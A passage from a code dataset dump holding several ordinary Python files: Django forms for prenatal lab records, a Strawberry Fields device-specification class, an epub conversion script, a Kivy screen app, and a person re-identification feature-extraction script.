choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n\n pap = forms.ChoiceField(\n label=u'PAP', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n iva = forms.ChoiceField(\n label=u'IVA', choices=Laboratorio.NORMAL_ANORMAL_CHOICES,\n widget=forms.RadioSelect)\n colposcopia = forms.ChoiceField(\n label=u'Colposcopia', choices=Laboratorio.NORMAL_ANORMAL_CHOICES,\n widget=forms.RadioSelect)\n\n class Meta:\n model = Laboratorio\n exclude = ('control', 'embarazo', 'paciente')\n\n def __init__(self, *args, **kwargs):\n super(LaboratorioForm, self).__init__(*args, **kwargs)\n\n atributos = {'class': 'hemoglobina', 'step': 0.01}\n\n self.fields['rapida_hemoglobina_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_1_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_2_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_3_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_4_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_5_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_alta_resultado'].widget.attrs = atributos\n\n for key in self.fields:\n field = self.fields[key]\n if field.label.lower() == 'fecha':\n field.widget.attrs['class'] = 'input-datepicker'\n\n def clean_rapida_sifilis_fecha(self):\n sifilis = self.cleaned_data['rapida_sifilis']\n fecha = self.cleaned_data['rapida_sifilis_fecha']\n\n '''if sifilis=='reactivo' or sifilis=='no reactivo':\n if fecha:\n return fecha\n else:\n raise forms.ValidationError(\n u'Ingrese la fecha')\n\n return fecha'''\n return self.validacion_fecha(sifilis, fecha)\n\n def clean_rapida_sifilis_2_fecha(self):\n sifilis = self.cleaned_data['rapida_sifilis_2']\n fecha = self.cleaned_data['rapida_sifilis_2_fecha']\n\n return self.validacion_fecha(sifilis, fecha)\n\n def clean_rapida_vih_1_fecha(self):\n vih = self.cleaned_data['rapida_vih_1']\n fecha = self.cleaned_data['rapida_vih_1_fecha']\n\n return self.validacion_fecha(vih, fecha)\n\n def clean_rapida_vih_2_fecha(self):\n vih = self.cleaned_data['rapida_vih_2']\n fecha = self.cleaned_data['rapida_vih_2_fecha']\n\n return self.validacion_fecha(vih, fecha)\n\n def validacion_fecha(self, campo, fecha):\n\n if campo == 'reactivo' or campo == 'no reactivo':\n if fecha:\n return fecha\n else:\n raise forms.ValidationError(\n u'Ingrese la fecha')\n\n return fecha\n\n\nclass DiagnosticoForm(forms.ModelForm):\n eg_elegida = forms.ChoiceField(\n label=u'Edad gestacional elegida', choices=Control.EG_CHOICES)\n\n class Meta:\n model = Diagnostico\n exclude = ('paciente', 'control')\n\n def __init__(self, *args, **kwargs):\n\n establecimiento_id = kwargs.pop('establecimiento_id')\n establecimiento_actual = Establecimiento.objects.get(id=establecimiento_id)\n super(DiagnosticoForm, self).__init__(*args, **kwargs)\n if self.instance.id:\n self.fields[\n 'eg_elegida'].initial = self.instance.control.eg_elegida\n\n if establecimiento_actual.is_sistema_externo_admision:\n self.fields['proxima_cita'].widget = forms.HiddenInput()\n self.fields['proxima_cita'].required = False\n\nclass ExamenFetalForm(forms.ModelForm):\n class Meta:\n model = ExamenFisicoFetal\n exclude = ('control','situacion','presentacion', 'posicion', 'movimientos_fetales')\n\nExamenFetalFormSet = inlineformset_factory(\n Ingreso,\n ExamenFisicoFetal,\n form=ExamenFetalForm,\n min_num=1,\n max_num=12,\n extra=0\n )\n\nExamenFetalMedicionFormSet = inlineformset_factory(\n PartogramaMedicion,\n ExamenFisicoFetal,\n 
form=ExamenFetalForm,\n min_num=1,\n max_num=12,\n extra=0\n )\n","sub_path":"apps/controles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":21975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"73023228","text":"# Copyright 2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis module contains a class that represents the specifications of\na device available via the API.\n\"\"\"\nfrom collections.abc import Sequence\nimport re\n\nimport blackbird\nfrom blackbird.error import BlackbirdSyntaxError\n\nimport strawberryfields as sf\nfrom strawberryfields.compilers import Ranges\n\n\nclass DeviceSpec:\n \"\"\"The specifications for a specific hardware device.\n\n Args:\n target (str): name of the target hardware device\n spec (dict): dictionary representing the raw device specification.\n This dictionary should contain the following key-value pairs:\n\n - layout (str): string containing the Blackbird circuit layout\n - modes (int): number of modes supported by the target\n - compiler (list): list of supported compilers\n - gate_parameters (dict): parameters for the circuit gates\n\n connection (strawberryfields.api.Connection): connection over which the\n job is managed\n \"\"\"\n\n def __init__(self, target, spec, connection):\n self._target = target\n self._connection = connection\n self._spec = spec\n\n @property\n def target(self):\n \"\"\"str: The name of the target hardware device.\"\"\"\n return self._target\n\n @property\n def layout(self):\n \"\"\"str: Returns a string containing the Blackbird circuit layout.\"\"\"\n return self._spec[\"layout\"]\n\n @property\n def modes(self):\n \"\"\"int: Number of modes supported by the device.\"\"\"\n return self._spec[\"modes\"]\n\n @property\n def compiler(self):\n \"\"\"list[str]: A list of strings corresponding to Strawberry Fields compilers supported\n by the hardware device.\"\"\"\n return self._spec[\"compiler\"]\n\n @property\n def default_compiler(self):\n \"\"\"sf.compilers.Compiler: Specified default compiler\"\"\"\n if self.compiler:\n return self.compiler[0]\n\n # For now, use Xunitary compiler by default for devices\n # if the default compiler is not specified.\n return \"Xunitary\"\n\n @property\n def gate_parameters(self):\n \"\"\"dict[str, strawberryfields.compilers.Ranges]: A dictionary of gate parameters\n and allowed ranges.\n\n The parameter names correspond to those present in the Blackbird circuit layout.\n\n **Example**\n\n >>> spec.gate_parameters\n {'squeezing_amplitude_0': x=0, x=1, 'phase_0': x=0, 0≤x≤6.283185307179586}\n \"\"\"\n gate_parameters = dict()\n\n for gate_name, param_ranges in self._spec[\"gate_parameters\"].items():\n # convert gate parameter allowed ranges to Range objects\n range_list = [[i] if not isinstance(i, Sequence) else i for i in param_ranges]\n gate_parameters[gate_name] = Ranges(*range_list)\n\n return gate_parameters\n\n def layout_is_formatted(self):\n \"\"\"bool: Whether 
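The validate_parameters logic further down in this DeviceSpec record hinges on the Ranges objects supporting Python's "in" operator. Below is a minimal stand-in showing only the membership behaviour relied on; SimpleRanges is a hypothetical sketch, not the real strawberryfields.compilers.Ranges class:

class SimpleRanges:
    def __init__(self, *intervals):
        # each interval is [x] for a single allowed value or [lo, hi] for a range
        self.intervals = [(i[0], i[-1]) for i in intervals]

    def __contains__(self, value):
        return any(lo <= value <= hi for lo, hi in self.intervals)

gate_params = {"squeezing_amplitude_0": SimpleRanges([0], [1]),
               "phase_0": SimpleRanges([0, 6.283185307179586])}
assert 1 in gate_params["squeezing_amplitude_0"]
assert 3.14 in gate_params["phase_0"]
assert 0.5 not in gate_params["squeezing_amplitude_0"]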
the device layout is formatted or not.\"\"\"\n p = re.compile(r\"{{\\w*}}\")\n return not bool(p.search(self.layout))\n\n def fill_template(self, program):\n \"\"\"Fill template with parameter values from a program\"\"\"\n if self.layout_is_formatted():\n return\n\n if program.type == \"tdm\":\n self._spec[\"layout\"] = self._spec[\"layout\"].format(\n target=self.target, tm=program.timebins\n )\n else:\n # TODO: update when `self._spec[\"layout\"]` is returned as an unformatted string\n raise NotImplementedError(\"Formatting not required or supported for non-TDM programs.\")\n\n def validate_parameters(self, **parameters):\n \"\"\"Validate gate parameters against the device spec.\n\n Gate parameters should be passed as keyword arguments, with names\n corresponding to those present in the Blackbird circuit layout.\n \"\"\"\n # check that all provided parameters are valid\n for p, v in parameters.items():\n if p in self.gate_parameters and v not in self.gate_parameters[p]:\n # parameter is present in the device specifications\n # but the user has provided an invalid value\n raise ValueError(\n f\"{p} has invalid value {v}. Only {self.gate_parameters[p]} allowed.\"\n )\n\n if p not in self.gate_parameters:\n raise ValueError(f\"Parameter {p} not a valid parameter for this device\")\n\n def create_program(self, **parameters):\n \"\"\"Create a Strawberry Fields program matching the low-level layout of the\n device.\n\n Gate arguments should be passed as keyword arguments, with names\n correspond to those present in the Blackbird circuit layout. Parameters not\n present will be assumed to have a value of 0.\n\n **Example**\n\n Device specifications can be retrieved from the API by using the\n :class:`~.Connection` class:\n\n >>> spec.create_program(squeezing_amplitude_0=0.43)\n \n\n Keyword Args:\n Supported parameter values for the specific device\n\n Returns:\n strawberryfields.program.Program: program compiled to the device\n \"\"\"\n try:\n bb = blackbird.loads(self.layout)\n except BlackbirdSyntaxError as e:\n raise BlackbirdSyntaxError(\"Layout is not formatted correctly.\") from e\n self.validate_parameters(**parameters)\n\n # determine parameter value if not provided\n extra_params = set(self.gate_parameters) - set(parameters)\n\n for p in extra_params:\n # Set parameter value as the first allowed\n # value in the gate parameters dictionary.\n parameters[p] = self.gate_parameters[p].ranges[0].x\n\n # evaluate the blackbird template\n bb = bb(**parameters)\n prog = sf.io.to_program(bb)\n prog._compile_info = (self, self.default_compiler)\n return prog\n\n def refresh(self):\n \"\"\"Refreshes the device specifications\"\"\"\n self._spec = self._connection._get_device_dict(self.target)\n","sub_path":"strawberryfields/api/devicespec.py","file_name":"devicespec.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381286486","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n\nimport argparse\nimport logging\nimport os\nimport subprocess\nimport sys\nimport uuid\n\nfrom ebooklib import epub\nfrom openpyxl import load_workbook\n\nfrom readers import find_reader\n\nversion_info = '0.1a0'\n\nUPLOAD_PATH = '/www/wwwroot/www.yancloud.red/Uploads/bookTemp'\n\n\ndef upload_file(filename):\n    cmdlist = ['ftp']\n    cmdlist.append(filename)\n    # run the external ftp command and capture its combined output\n    p = subprocess.Popen(cmdlist,\n                         stdout=subprocess.PIPE,\n                         stderr=subprocess.STDOUT)\n    output, _ = p.communicate()\n\n\ndef save_result(filelist, result, filename=None):\n    if filename is None:\n        filename = 'upload-epub.xlsx'\n    template = os.path.join(os.path.dirname(__file__), 'upload.xltx')\n    wb = load_workbook(template)\n    wb.template = False\n\n    start_row = 3\n    filename_col = 'A'\n    author_col = 'D'\n    author_info_col = 'E'\n    isbn_col = 'F'\n    date_col = 'G'\n    publisher_col = 'H'\n    price_col = 'I'\n    intro_col = 'J'\n    path_col = 'K'\n\n    def format_author(a):\n        return ','.join(a.split())\n\n    def format_date(a):\n        for t in ('年', '月', '日', '/'):\n            a = a.replace(t, '-')\n        s = [x.strip() for x in a.split('-') if x.strip()]\n        if len(s) == 2:\n            s.append('1')\n        return '-'.join(s)\n\n    ws = wb.active\n    row = start_row\n    for name, meta in zip(filelist, result):\n        rs = str(row)\n        name = os.path.basename(name).rsplit('.', 1)[0]\n        ws[filename_col + rs] = meta.get('title', name)\n        ws[author_col + rs] = format_author(meta.get('author', ''))\n        ws[author_info_col + rs] = meta.get('author_info')\n        ws[isbn_col + rs] = meta.get('ISBN')\n        ws[date_col + rs] = format_date(meta.get('date', ''))\n        ws[publisher_col + rs] = meta.get('publisher')\n        ws[price_col + rs] = meta.get('price')\n        ws[intro_col + rs] = meta.get('intro')\n        ws[path_col + rs] = name + '.epub'\n        row += 1\n\n    wb.save(filename)\n    wb.close()\n\n    return filename\n\n\ndef process_file(filename, output='output'):\n    logging.info('Processing %s...', filename)\n    reader = find_reader(filename)\n    if reader is None:\n        raise Exception('不支持的文件类型')\n\n    reader.open(filename)\n\n    book = epub.EpubBook()\n    book.FOLDER_NAME = 'OEBPS'\n\n    style = '''body { qrfullpage:1; text-align:center; }\n    img { max-width: 80% }'''\n    cover_css = epub.EpubItem(uid=\"style_cover\",\n                              file_name=\"cover.css\",\n                              media_type=\"text/css\",\n                              content=style)\n    book.add_item(cover_css)\n\n    path = os.path.dirname(__file__)\n    with open(os.path.join(path, 'templates', 'default.css')) as f:\n        default_css = epub.EpubItem(uid=\"style_default\",\n                                    file_name=\"../Styles/default.css\",\n                                    media_type=\"text/css\",\n                                    content=f.read())\n    book.add_item(default_css)\n\n    meta = reader.get_metadata()\n    book.set_identifier(meta.get('ISBN', str(uuid.uuid4())))\n\n    name = os.path.splitext(os.path.basename(filename))[0]\n    book.set_title(meta.get('title', name))\n    book.set_language('zh')\n\n    author = meta.get('author')\n    if author:\n        book.add_author(author)\n\n    cover = reader.get_cover()\n    if cover:\n        book.set_cover('Images/coverpage.jpg', open(cover, 'rb').read())\n        book.get_item_with_id('cover').add_item(cover_css)\n        book.toc = [epub.Link('cover.xhtml', '封面', 'cover')]\n    else:\n        book.toc = []\n\n    css_items = []\n    for item in reader.stylesheets():\n        book.add_item(item)\n        css_items.append(item)\n\n    for item in reader.contents():\n        if isinstance(item, epub.EpubHtml):\n            item.add_item(default_css)\n            for css in css_items:\n                item.add_item(css)\n        book.add_item(item)\n\n    for item in reader.images():\n        book.add_item(item)\n\n    # sec = None\n    # for item in reader.get_toc():\n    #     n, p = item\n    #     if isinstance(p, str):\n    #         if sec 
is not None:\n # book.toc.append(sec)\n # s = epub.Section(p)\n # sec = s, []\n # else:\n # if sec[0].href == '':\n # sec[0].href = p.get_name()\n # sec[1].append(p)\n # if sec is not None:\n # book.toc.append(sec)\n\n toc = reader.get_toc()\n if toc is None:\n raise Exception('不正确的章节结构')\n book.toc.extend(toc)\n\n reader.close()\n\n book.add_item(epub.EpubNcx())\n book.add_item(epub.EpubNav())\n\n book.spine = ['cover', 'nav']\n book.spine.extend(list(book.get_items_of_type(9))[1:-1])\n\n if not os.path.exists(output):\n os.makedirs(output)\n epub.write_epub(os.path.join(output, name + '.epub'), book)\n return meta\n\n\ndef main(args):\n parser = argparse.ArgumentParser(\n prog='mkepub',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='Make epub from pdf or text file',\n )\n parser.add_argument('-v', '--version', action='version',\n version=version_info)\n parser.add_argument('-q', '--silent', action='store_true',\n help='Suppress all normal output')\n\n parser.add_argument('-O', '--output', default='output', metavar='PATH')\n parser.add_argument('-c', '--cover', metavar='IMAGE',\n help='Filename of cover image]')\n parser.add_argument('-t', '--template', metavar='PATH',\n help='Template path')\n parser.add_argument('filenames', nargs='+', help='Source filenames')\n\n args = parser.parse_args(args)\n if args.silent:\n logging.getLogger().setLevel(100)\n\n for filename in args.filenames:\n process_file(filename, args.output)\n\n\ndef main_entry():\n logging.basicConfig(\n level=logging.INFO,\n format='%(levelname)-8s %(message)s',\n )\n try:\n main(sys.argv[1:])\n except Exception as e:\n if sys.flags.debug:\n raise\n logging.error('%s', e)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main_entry()\n # main(['test/examples/解读延安精神.txt'])\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"485337120","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.metrics import sp\nfrom kivy.properties import NumericProperty\nfrom kivy.properties import ObjectProperty\nfrom kivy.properties import StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivy.uix.screenmanager import SlideTransition\nimport os\n\n# Create both screens. Please note the root.manager.current: this is how\n# you can control the ScreenManager from kv. 
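The transform record that ends above drives ebooklib through a custom reader and a spreadsheet exporter. For reference, the minimal end-to-end shape of an EPUB build with that library looks roughly like this; a hedged sketch in which the identifier, titles and file names are placeholders:

from ebooklib import epub

book = epub.EpubBook()
book.set_identifier('sample-0001')
book.set_title('Sample Book')
book.set_language('zh')

chapter = epub.EpubHtml(title='Chapter 1', file_name='chap1.xhtml', lang='zh')
chapter.content = '<h1>Chapter 1</h1><p>Hello.</p>'
book.add_item(chapter)

book.toc = [chapter]
book.add_item(epub.EpubNcx())   # legacy table of contents
book.add_item(epub.EpubNav())   # EPUB3 navigation document
book.spine = ['nav', chapter]
epub.write_epub('sample.epub', book)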
Each screen has by default a\n# property manager that gives you the instance of the ScreenManager used.\n\n# Declare both screens\n\n\n__version__ = '1.0.0'\n\nslides = [\"Register\", \"Welcome\", \"Login\"]\nfor slide in slides:\n kv_file = \"{}.kv\".format(slide.lower())\n Builder.load_file(os.path.join(\"slides\", kv_file))\n\n\nclass RegisterScreen(Screen):\n pass\n\n\nclass WelcomeScreen(Screen):\n pass\n\n\nclass LoginScreen(Screen):\n pass\n\n\nclass veni(BoxLayout):\n def __init__(self, **kwargs):\n super(veni, self).__init__(**kwargs)\n self.orientation = 'vertical'\n self.content = ScreenManager()\n self.content.add_widget(RegisterScreen(name='Register'))\n self.content.add_widget(WelcomeScreen(name='Welcome'))\n self.content.add_widget(LoginScreen(name=\"Login\"))\n self.content.current = 'Welcome'\n self.add_widget(self.content)\n self.slide_menu = SlideMenu(root=self)\n self.add_widget(self.slide_menu)\n\n def get_current_slide(self):\n return self.content.current\n\n def set_current_slide(self, jump_to):\n if slides.index(jump_to) >= slides.index(self.get_current_slide()):\n self.set_transition('left')\n else:\n self.set_transition('right')\n self.content.current = jump_to\n self.slide_menu.ids.slide_spinner.text = \"\"\n\n def set_transition(self, direction):\n self.content.transition = SlideTransition(direction=direction)\n\n\nBuilder.load_file(\"slidemenu.kv\")\n\n\nclass SlideMenu(BoxLayout):\n slide_spinner = ObjectProperty(None)\n\n def __init__(self, root, **kwargs):\n super(SlideMenu, self).__init__(**kwargs)\n self.root = root\n self.slide_spinner.values = slides\n\n def go_slide(self, spinner):\n if spinner.text in slides:\n self.root.set_current_slide(spinner.text)\n\n def go_prev(self):\n cur_index = slides.index(self.root.get_current_slide())\n prev_index = cur_index if cur_index == 0 else cur_index-1\n self.root.set_current_slide(slides[prev_index])\n\n def go_next(self):\n cur_index = slides.index(self.root.get_current_slide())\n next_index = cur_index if cur_index == len(slides)-1 else cur_index+1\n self.root.set_current_slide(slides[next_index])\n\n\nclass veniApp(App):\n font_size_regular = sp(20)\n font_size_large = font_size_regular * 2\n font_size_xlarge = font_size_regular * 3\n\n def build(self):\n return veni()\n\nif __name__ == '__main__':\n veniApp().run()","sub_path":"src/veniApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"555462548","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, division\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport torch.backends.cudnn as cudnn\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport time\nimport os\nimport scipy.io\nimport yaml\nimport math\nfrom model import ft_net\n\n######################################################################\n# Options\n# --------\n\nparser = argparse.ArgumentParser(description='Training')\nparser.add_argument('--gpu_ids', default='5', type=str, help='gpu_ids: e.g. 
0 0,1,2 0,2')\nparser.add_argument('--which_epoch', default='last', type=str, help='0,1,2,3...or last')\nparser.add_argument('--test_dir',\n default='/data2/wangshengkang/ingenious/a/skillful/reiddatasets/Market-1501-v15.09.15/pytorch',\n type=str,\n help='./test_data')\nparser.add_argument('--name', default='ft_ResNet50', type=str, help='save model path')\nparser.add_argument('--batchsize', default=256, type=int, help='batchsize')\nparser.add_argument('--multi', action='store_true', help='use multiple query')\nparser.add_argument('--ms', default='1', type=str, help='multiple_scale: e.g. 1 1,1.1 1,1.1,1.2')\n# 使用parse_args()解析添加的参数\nopt = parser.parse_args()\n###load config###\n# load the training config\nconfig_path = os.path.join('./model', opt.name, 'opts.yaml')\nwith open(config_path, 'r') as stream:\n config = yaml.load(stream)\n\nopt.stride = config['stride']\n\nif 'nclasses' in config: # tp compatible with old config files\n opt.nclasses = config['nclasses']\nelse:\n opt.nclasses = 751\n\nstr_ids = opt.gpu_ids.split(',') # 将gpu字符串分开\n# which_epoch = opt.which_epoch\nname = opt.name # 模型名字\ntest_dir = opt.test_dir # 测试集地址\n\ngpu_ids = [] # 创建gpu列表\nfor str_id in str_ids:\n id = int(str_id) # 将str转为int\n if id >= 0:\n gpu_ids.append(id) # 将可用gpu加入gpu列表\n\nprint('We use the scale: %s' % opt.ms) # 将使用的图片尺度打印出来\nstr_ms = opt.ms.split(',') # 将多尺度参数通过逗号分开\nms = [] # 创建多尺度的列表\nfor s in str_ms:\n s_f = float(s) # 将str参数变为float\n ms.append(math.sqrt(s_f)) # sqrt()算平方根\n\n# set gpu ids\nif len(gpu_ids) > 0: # 如果有gpu\n torch.cuda.set_device(gpu_ids[0]) # 设置用哪块gpu,只用第一块就够了\n '''\n 总的来说,大部分情况下,设置这个 flag 可以让内置的 cuDNN 的 auto-tuner 自动寻找最适合当前配置的高效算法,来达到优化运行效率的问题。\n 一般来讲,应该遵循以下准则:\n 如果网络的输入数据维度或类型上变化不大,设置 torch.backends.cudnn.benchmark = true 可以增加运行效率;\n 如果网络的输入数据在每次 iteration 都变化的话,会导致 cnDNN 每次都会去寻找一遍最优配置,这样反而会降低运行效率。 \n '''\n cudnn.benchmark = True\n\n######################################################################\n# Load Data\n# ---------\n#\n# We will use torchvision and torch.utils.data packages for loading the\n# data.\n#\ndata_transforms = transforms.Compose([\n transforms.Resize((256, 128), interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\ndata_dir = test_dir # 数据集地址\nif data_dir == 'market':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/Market-1501-v15.09.15/pytorch'\nelif data_dir == 'duke':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/DukeMTMC-reID/pytorch'\nelif data_dir == 'msmt':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/MSMT17/pytorch'\n\n# 数据集弄成dataloader的形式\nimage_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms) for x in ['gallery', 'query']}\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=opt.batchsize,\n shuffle=False, num_workers=16) for x in ['gallery', 'query']}\nclass_names = image_datasets['query'].classes # 行人ID的数量\nuse_gpu = torch.cuda.is_available() # 是否有gpu\n\n\n######################################################################\n# Load model\n# ---------------------------\ndef load_network(network):\n save_path = os.path.join('./model', name, 'net_%s.pth' % opt.which_epoch) # 保存模型的路径\n network.load_state_dict(torch.load(save_path)) # 保存模型\n return network\n\n\n######################################################################\n# Extract feature\n# ----------------------\n#\n# Extract feature from a trained model.\n#\ndef fliplr(img):\n '''flip horizontal'''\n 
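The index_select trick used by the fliplr helper defined at this point is easiest to see on a tensor small enough to eyeball; in recent PyTorch it is equivalent to torch.flip(img, dims=[3]). A self-contained demo:

import torch

def flip_width(img):
    # reverse the last (W) dimension: indices W-1, W-2, ..., 0
    inv_idx = torch.arange(img.size(3) - 1, -1, -1).long()
    return img.index_select(3, inv_idx)

x = torch.arange(8.0).reshape(1, 1, 2, 4)   # N x C x H x W
print(flip_width(x)[0, 0])                  # rows become [3,2,1,0] and [7,6,5,4]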
# arange\n # torch.range(start=1, end=6) 的结果是会包含end的,\n # 而torch.arange(start=1, end=6)的结果并不包含end。\n # 两者创建的tensor的类型也不一样。\n #将W维度的数据位置倒过来\n inv_idx = torch.arange(img.size(3) - 1, -1, -1).long() # N x C x H x W\n '''\n Returns a new tensor which indexes the input tensor along dimension dim using the\n entries in index which is a LongTensor.\n The returned tensor has the same number of dimensions as the original tensor (input).\n The dimth dimension has the same size as the length of index; other dimensions\n have the same size as in the original tensor.\n 参数:\n dim:表示从第几维挑选数据,类型为int值;\n index:表示从第一个参数维度中的哪个位置挑选数据,类型为torch.Tensor类的实例;\n '''\n #将W维度的数���按照倒过来的索引读取,这样就实现了图片翻转\n img_flip = img.index_select(3, inv_idx)\n return img_flip\n\n\n# 提取特征\ndef extract_feature(model, dataloaders):\n features = torch.FloatTensor() # 创建一个tensor\n count = 0 # 目前所有batch的图片数量初始化\n for data in dataloaders:\n img, label = data # 图片和标签\n n, c, h, w = img.size() # 图片的N,C,H,W\n count += n # 将每个batch的图片数量加起来\n print(count) # 打印目前所有batch的图片数量\n ff = torch.FloatTensor(n, 512).zero_().cuda() # 创建一个大小为n*512的0矩阵\n\n for i in range(2):#用原始图片和翻转图片,来获得更稳定的特征\n if (i == 1):\n img = fliplr(img)#将图片翻转\n input_img = Variable(img.cuda()) # 放到gpu里面,并且用varibale包装\n for scale in ms:\n if scale != 1: # 如果使用多尺度的话\n # bicubic is only available in pytorch>= 1.1\n # 根据给定的size或scale_factor参数来对输入进行下/上采样使用的插值算法取决于参数mode的设置\n # 参数:\n # input (Tensor) – 输入张量\n # size (int or Tuple[int] or Tuple[int, int] or Tuple[int, int, int]) –输出大小.\n # scale_factor (float or Tuple[float]) – 指定输出为输入的多少倍数。如果输入为tuple,其也要制定为tuple类型\n # mode (str) – 可使用的上采样算法,有'nearest', 'linear', 'bilinear', 'bicubic' , 'trilinear'和'area'. 默认使用'nearest'\n # align_corners (bool, optional) –几何上,我们认为输入和输出的像素是正方形,而不是点。\n # 如果设置为True,则输入和输出张量由其角像素的中心点对齐,从而保留角像素处的值。\n # 如果设置为False,则输入和输出张量由它们的角像素的角点对齐,插值使用边界外值的边值填充;\n # 当scale_factor保持不变时,使该操作独立于输入大小。仅当使用的算法为'linear', 'bilinear',\n # 'bilinear'or 'trilinear'时可以使用。默认设置为False\n input_img = nn.functional.interpolate(input_img, scale_factor=scale, mode='bicubic',\n align_corners=False)\n outputs = model(input_img) # 如果没用多尺度\n ff += outputs\n # norm feature\n '''\n 返回所给tensor的矩阵范数或向量范数\n 参数:\n input:输入tensor\n p (int, float, inf, -inf, 'fro', 'nuc', optional):范数计算中的幂指数值。默认为'fro'\n dim (int,2-tuple,2-list, optional): 指定计算的维度。如果是一个整数值,向量范数将被计算;如果是一个大小为2的元组,矩阵范数将被计算;如果为None,当输入tensor只有两维时矩阵计算矩阵范数;当输入只有一维时则计算向量范数。如果输入tensor超过2维,向量范数将被应用在最后一维\n keepdim(bool,optional):指明输出tensor的维度dim是否保留。如果dim=None或out=None,则忽略该参数。默认值为False,不保留\n out(Tensor, optional):tensor的输出。如果dim=None或out=None,则忽略该参数。\n dtype(torch.dtype,optional):指定返回tensor的期望数据类型。如果指定了该参数,在执行该操作时输入tensor将被转换成 :attr:’dtype’\n '''\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)# L2-norm p取2计算的是2-范数,也就是距离\n '''\n expand_as(other) → Tensor\n Expand this tensor to the same size as other. 
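The torch.norm / expand_as / div chain documented here reduces to per-row L2 normalisation of the feature matrix; a two-vector example makes the effect concrete:

import torch

ff = torch.tensor([[3.0, 4.0], [6.0, 8.0]])        # two feature vectors
fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)   # [[5.], [10.]]
print(ff.div(fnorm.expand_as(ff)))                 # both rows become [0.6, 0.8]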
self.expand_as(other) is equivalent to self.expand(other.size()).\n Please see expand() for more information about expand.\n Parameters\n other (torch.Tensor) – The result tensor has the same size as other.\n torch.div()\n out=input/other\n torch.div(input, other, out=None) → Tensor\n Divides each element of the input input with the scalar other and returns a new resulting tensor.\n '''\n ff = ff.div(fnorm.expand_as(ff))\n #竖着拼接在一起\n features = torch.cat((features, ff.data.cpu()), 0)\n return features\n\n\ndef get_id(img_path):\n camera_id = []#摄像机id的列表\n labels = []#标签的列表\n for path, v in img_path:\n # filename = path.split('/')[-1]\n filename = os.path.basename(path)#返回文件名\n label = filename[0:4]#标签为文件名的前四位,也就是前四位数字作文标签\n #将字符串从c分开,取后面那部分\n camera = filename.split('c')[1]\n # -1 表示检测出来其他人的图���不在这 750 人中)\n if label[0:2] == '-1':\n labels.append(-1)\n else:\n labels.append(int(label))\n camera_id.append(int(camera[0]))#将前面分离出来的字符串第一个字符取出作为摄像头的标签\n return camera_id, labels\n\n\ngallery_path = image_datasets['gallery'].imgs # gallery数据集\nquery_path = image_datasets['query'].imgs # query数据集\n\ngallery_cam, gallery_label = get_id(gallery_path) # 获取gallery的id\nquery_cam, query_label = get_id(query_path) # 获取query的id\n\n######################################################################\n# Load Collected data Trained model\nprint('-------test-----------')\n\n# 调用模型,resnet\nmodel_structure = ft_net(opt.nclasses, stride=opt.stride)\n\n# 加载模型参数\nmodel = load_network(model_structure)\n\n# Remove the final fc layer and classifier layer\n# 讲模型最后的分类层去掉\nmodel.classifier.classifier = nn.Sequential()\n\n# Change to test mode\nmodel = model.eval()\nif use_gpu:\n model = model.cuda() # 如果有gpu,模型放到gpu里面\n\n# Extract feature\n# 用于停止autograd模块的工作,以起到加速和节省显存的作用,具体行为就是\n# 停止gradient计算,从而节省了GPU算力和显存,但是并不会影响dropout和batchnorm\n# 层的行为。\nwith torch.no_grad():\n # 提取gallery特征\n gallery_feature = extract_feature(model, dataloaders['gallery'])\n # 提取query特征\n query_feature = extract_feature(model, dataloaders['query'])\n\n# Save to Matlab for check\nresult = {'gallery_f': gallery_feature.numpy(), 'gallery_label': gallery_label, 'gallery_cam': gallery_cam,\n 'query_f': query_feature.numpy(), 'query_label': query_label, 'query_cam': query_cam}\nscipy.io.savemat('pytorch_result.mat', result)\n\nprint(opt.name) # 打印此时运行程序的名字\nresult = './model/%s/result.txt' % opt.name\n# | 表示管道,上一条命令的输出,作为下一条命令参数\n# Linux 